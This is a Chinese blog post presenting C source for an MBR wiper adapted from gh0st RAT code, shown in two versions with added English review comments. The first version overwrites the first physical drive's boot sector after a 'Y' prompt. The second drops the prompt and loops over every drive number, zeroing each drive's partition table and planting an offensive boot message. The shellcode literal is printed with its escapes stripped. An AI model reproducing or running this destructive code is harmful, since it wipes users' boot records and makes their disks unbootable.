对硬盘扇区的操作,练手代码

/*

//KILLMBR.c
源自gh0st远控3.6版的源码中对版权保护的硬盘锁,只做了少量修改
通过这一篇文章了解 http://blog.csdn.net/qiurisuixiang/article/details/7314882 
2013/7/11 by赫
*/
#include "stdafx.h"
// Forward declaration; KillMBR() is defined after _tmain.
int KillMBR() ;
// scode: the data KillMBR() copies to the start of its 512-byte sector buffer
// (it copies sizeof(scode) - 1 bytes, i.e. everything except the literal's
// terminating NUL). The page text says the part beginning "x49x20x61x6d..." is
// the message shown on screen at the next boot; the leading part is presumably
// the real-mode stub that prints it -- not verified here.
// NOTE(review): the literal as rendered on this page has lost its escape
// characters, so what is printed is not the byte sequence itself. Read this
// listing as an illustration for analysis, not as buildable source.
unsigned char scode[] = 
"xb8x12x00xcdx10xbdx18x7cxb9x18x00xb8x01x13xbbx0c" 
"x00xbax1dx0excdx10xe2xfex49x20x61x6dx20x48x45x20" 
"x46x75x63x6bx20x79x6fx75x0Dx3Cx3Cx3Cx2Bx3Ex3Ex3E"; 

// Entry point of the first listing: prints a warning banner, reads one wide
// character from stdin and calls KillMBR() only when that character is 'Y'.
// Any other input skips the call and falls through to the trailing reads.
int _tmain(int argc, _TCHAR* argv[])
{
    // Select the "chs" locale before printing the wide-character banner below.
    _wsetlocale(LC_ALL, L"chs");
    wchar_t YesOrNo;
    wprintf(L"***********************************");
    wprintf(L"此程序有高度危险性是否要执行?
");
    wprintf(L"继续请输入Y(大写),输入其他退出
");
    wprintf(L"By赫");
    wprintf(L"***********************************");
    // This single confirmation character is the only gate in front of the
    // destructive disk write.
    YesOrNo = getwchar();

    if(YesOrNo == L'Y')
    {
        // KillMBR() ends in ExitProcess(-1) once the drive handle was opened,
        // so control comes back here only when the open failed (return -1).
        KillMBR();
    }

    // Reached when the user declined or when KillMBR() returned -1.
    getwchar();

    getwchar();
    return 0;
}
 
// KillMBR: builds a 512-byte sector image in memory and writes it through a
// handle opened on the first physical drive. DESTRUCTIVE: the image replaces
// the existing boot sector.
//
// Returns -1 when the drive cannot be opened. On every other path the process
// is terminated by ExitProcess(-1), so the final `return 0` is never reached.
//
// Review notes (defensive):
//  - The buffer is zero-initialised and only the leading scode bytes and the
//    two signature bytes are set, so everything in between is written as
//    zeros. On a classic MBR disk that range includes the partition table;
//    the file data itself is not touched by this single-sector write, so
//    recovery is a matter of restoring the boot sector and partition table
//    from a backup or rebuilding them.
//  - Opening a physical-drive device for writing normally requires
//    administrative rights on Windows, so running users without elevation is
//    an effective control. The page also notes that antivirus products
//    intercept this behaviour.
//  - None of the DeviceIoControl/WriteFile return values are checked, so the
//    function gives the caller no indication of whether anything was written.
int KillMBR() 
{ 
    HANDLE hDevice; 
    DWORD dwBytesWritten, dwBytesReturned; 
    // One sector's worth of bytes, all zero to begin with.
    BYTE pMBR[512] = {0}; 
     
    // Rebuild the MBR image: scode (minus its terminating NUL) at offset 0,
    // then the 0x55 0xAA boot signature in the last two bytes.
    memcpy(pMBR, scode, sizeof(scode) - 1); 
    pMBR[510] = 0x55; 
    pMBR[511] = 0xAA; 
     
    // Open the raw disk device (not a file system path) for read/write.
    // A user-mode process requesting write access to a PHYSICALDRIVE device
    // is the most useful observable for detection of this technique.
    hDevice = CreateFile 
        ( 
        L"\\.\PHYSICALDRIVE0", 
        GENERIC_READ | GENERIC_WRITE, 
        FILE_SHARE_READ | FILE_SHARE_WRITE, 
        NULL, 
        OPEN_EXISTING, 
        0, 
        NULL 
        ); 
    if (hDevice == INVALID_HANDLE_VALUE) 
        return -1; 
    // NOTE(review): FSCTL_LOCK_VOLUME is documented for volume handles;
    // whether it succeeds on this handle is not checked.
    DeviceIoControl 
        ( 
        hDevice,  
        FSCTL_LOCK_VOLUME,  
        NULL,  
        0,  
        NULL,  
        0,  
        &dwBytesReturned,  
        NULL 
        ); 
    // Write the malicious sector image. The handle was just opened and never
    // repositioned, so the write starts at offset 0 of the device.
    WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL); 
    DeviceIoControl 
        ( 
        hDevice,  
        FSCTL_UNLOCK_VOLUME,  
        NULL,  
        0,  
        NULL,  
        0,  
        &dwBytesReturned,  
        NULL 
        ); 
    CloseHandle(hDevice); 
 
    // Terminates the whole process with exit code -1; nothing after this runs.
    ExitProcess(-1); 
    return 0; 
} 

      https://github.com/HeMinzhang/Hello-World/blob/master/windows/KillMBR/KillMBR.cpp 我的github

unsigned char scode[] 的第 2 段中,从 "x49x20x61x6dx20x48x45x20" 开始的部分,是程序成功运行后,再次开机时在屏幕上显示的字符。
 
关键的一点是:CreateFile 打开 \\.\PHYSICALDRIVE0(对应第一扇区),然后 DeviceIoControl 对设备执行操作,WriteFile 把数据写入扇区,最后 DeviceIoControl 再次对设备执行操作。
 
此类 MBR 程序在运行时破坏 MBR 的行为,几年前就已被国内杀毒厂商拦截。这类程序必须先以写权限打开物理磁盘设备,这一步本身就是可以被监控和阻止的行为。
 
因为在 Win7 下测试无效,所以我改良了程序,代码如下。改良后的程序有效,只是显示的字符不正确。
/*
源自gh0st远控3.6版的源码中对版权保护的硬盘锁,只做了少量修改
通过这一篇文章了解 http://blog.csdn.net/qiurisuixiang/article/details/7314882 
2013/7/11 by赫
*/
#include "stdafx.h"
// Forward declaration; KillMBR() is defined after _tmain.
int KillMBR() ;

// scode: the data KillMBR() copies to the start of its 512-byte sector buffer
// (sizeof(scode) - 1 bytes, i.e. without the literal's terminating NUL).
// NOTE(review): the literal as rendered on this page has lost its escape
// characters, so what is printed is not the byte sequence itself. Read this
// listing as an illustration for analysis, not as buildable source.
unsigned char scode[] = 
"xb8x12x00xcdx10xbdx18x7cxb9x18x00xb8x01x13xbbx0c" 
"x00xbax1dx0excdx10xe2xfex49x20x61x6dx20x48x45x20" 
"x46x75x63x6bx20x79x6fx75x0Dx3Cx3Cx3Cx2Bx3Ex3Ex3E"; 

// Sr: global drive number. KillMBR() formats it into the device path it opens,
// and _tmain changes it between calls. Starts at 10.
DWORD Sr = 10;
// Entry point of the second listing. Unlike the first listing there is no
// prompt or confirmation: the loop starts calling KillMBR() immediately and
// never terminates on its own (the `return 0` after the loop is unreachable).
//
// Each iteration adjusts the global Sr, which KillMBR() uses as the physical
// drive number:
//  - while Sr is below 11 it is decremented before the call, so starting from
//    10 the calls use 9 down to 0;
//  - once Sr is 0 it is reset to 11 and the call uses 11;
//  - from then on the call comes first and Sr is incremented afterwards, so
//    the drive number keeps climbing.
//
// Review notes (defensive): the impact is not limited to the boot disk; every
// attached disk whose number is reached, which would include external or
// backup drives, gets the same write. KillMBR()'s return value is ignored, so
// drives that cannot be opened just produce a tight stream of failed opens on
// successive PHYSICALDRIVE numbers, which is a distinctive pattern in
// endpoint telemetry.
int _tmain(int argc, _TCHAR* argv[])
{
    while(1)
    {
        if(Sr == 0)
        {
            // Drive 0 was handled on the previous iteration; jump past 10.
            Sr = 11;
            KillMBR();
        }
        else if(Sr < 11)
        {
            // Counting down: decrement first, then act on the new number.
            Sr--;
            KillMBR();
        }
        else
        {
            // Counting up: act on the current number, then advance.
            KillMBR();
            Sr++;
        }
    }
    return 0;
}
 
// KillMBR (second listing): builds a 512-byte sector image in memory and
// writes it through a handle opened on the physical drive whose number is the
// global Sr. DESTRUCTIVE: the image replaces that drive's existing boot sector.
//
// Returns -1 when the drive cannot be opened, 0 otherwise. The ExitProcess
// call of the first listing is commented out here, so the function returns
// and the caller's loop moves on to another drive number.
//
// Review notes (defensive):
//  - The buffer is zero-initialised and only the leading scode bytes and the
//    two signature bytes are set, so everything in between is written as
//    zeros. On a classic MBR disk that range includes the partition table;
//    the file data itself is not touched by this single-sector write, so
//    recovery is a matter of restoring the boot sector and partition table
//    from a backup or rebuilding them.
//  - Opening a physical-drive device for writing normally requires
//    administrative rights on Windows, so running users without elevation is
//    an effective control.
//  - None of the StringCchPrintf/DeviceIoControl/WriteFile return values are
//    checked, so a return of 0 does not show that anything was written.
int KillMBR() 
{ 
    HANDLE hDevice; 
    DWORD dwBytesWritten, dwBytesReturned; 
    // One sector's worth of bytes, all zero to begin with.
    BYTE pMBR[512] = {0}; 
     
    // Receives the device path built from Sr below.
    wchar_t MBR_Path[128] ;
    // Rebuild the MBR image: scode (minus its terminating NUL) at offset 0,
    // then the 0x55 0xAA boot signature in the last two bytes.
    memcpy(pMBR, scode, sizeof(scode) - 1); 
    pMBR[510] = 0x55; 
    pMBR[511] = 0xAA; 
     
    // Format the physical-drive device name for the current value of Sr.
    StringCchPrintf(MBR_Path,128,_T("\\.\PHYSICALDRIVE%d%c"),Sr,_T(''));
 
    // Open the raw disk device (not a file system path) for read/write.
    // A user-mode process requesting write access to a PHYSICALDRIVE device
    // is the most useful observable for detection of this technique.
    hDevice = CreateFile 
        ( 
        MBR_Path, 
        GENERIC_READ | GENERIC_WRITE, 
        FILE_SHARE_READ | FILE_SHARE_WRITE, 
        NULL, 
        OPEN_EXISTING, 
        0, 
        NULL 
        ); 
    if (hDevice == INVALID_HANDLE_VALUE) 
        return -1; 
    // NOTE(review): FSCTL_LOCK_VOLUME is documented for volume handles;
    // whether it succeeds on this handle is not checked.
    DeviceIoControl 
        ( 
        hDevice,  
        FSCTL_LOCK_VOLUME,  
        NULL,  
        0,  
        NULL,  
        0,  
        &dwBytesReturned,  
        NULL 
        ); 

    // Write the malicious sector image. The handle was just opened and never
    // repositioned, so the write starts at offset 0 of the device.
    WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL); 
    DeviceIoControl 
        ( 
        hDevice,  
        FSCTL_UNLOCK_VOLUME,  
        NULL,  
        0,  
        NULL,  
        0,  
        &dwBytesReturned,  
        NULL 
        ); 
    CloseHandle(hDevice); 
    // Left disabled by the author so that the caller's loop keeps running.
    //ExitProcess(-1); 

    return 0; 
} 

依次读取所有扇区然后Clean之

原文地址:https://www.cnblogs.com/zero5/p/3185373.html